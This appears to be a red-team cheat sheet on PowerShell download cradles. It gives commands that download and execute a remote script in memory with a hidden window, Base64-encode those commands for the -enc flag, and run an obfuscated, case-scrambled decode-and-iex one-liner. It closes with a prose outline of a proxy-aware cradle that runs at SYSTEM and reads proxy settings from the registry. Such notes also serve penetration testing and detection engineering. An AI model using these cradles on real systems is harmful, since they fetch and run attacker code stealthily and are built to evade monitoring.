PS Execution - Download Cradles
To execute a PowerShell script in memory with a hidden window:
powershell -nop -w hidden -c "IEX ((new-object net.webclient).downloadstring('http://example.com/a'))"
To encode a command as UTF-16LE Base64 (the format -enc expects):
In Linux:
echo -n "{command to execute}" | iconv -t utf-16le | base64 -w 0; echo
In Windows:
$str = 'IEX ((new-object net.webclient).downloadstring("http://example.com/a"))'
[System.Convert]::ToBase64String([System.Text.Encoding]::Unicode.GetBytes($str))
To execute encoded commands:
powershell -nop -w hidden -enc {encoded command}
To run a bypass inline from a Base64 string, instead of downloading it from a server and then loading it in memory:
[sYSTEm.tExT.EnCoDInG]::uNIcode.gETsTRing([SySteM.CoNVeRT]::FromBAse64strINg("{base64 here}"))|iex
- Proxy-Aware Download Cradle (System)
To remove the proxy settings by “nulling” them:
To customize the User-Agent:
Example of a Proxy-Aware download cradle script running at SYSTEM integrity:
First, create a PSDrive for the HKEY_USERS Registry Hive.
Then, enumerate Registry Keys under HKEY_USERS.
After that, find a Registry Key whose name matches the pattern "S-1-5-21-", which is typically associated with user profiles on a Windows system.
Then, read the Proxy Server Settings from the Registry and use those settings to configure the System Proxy Settings.
Finally, download a PowerShell script from a remote server using the configured proxy settings.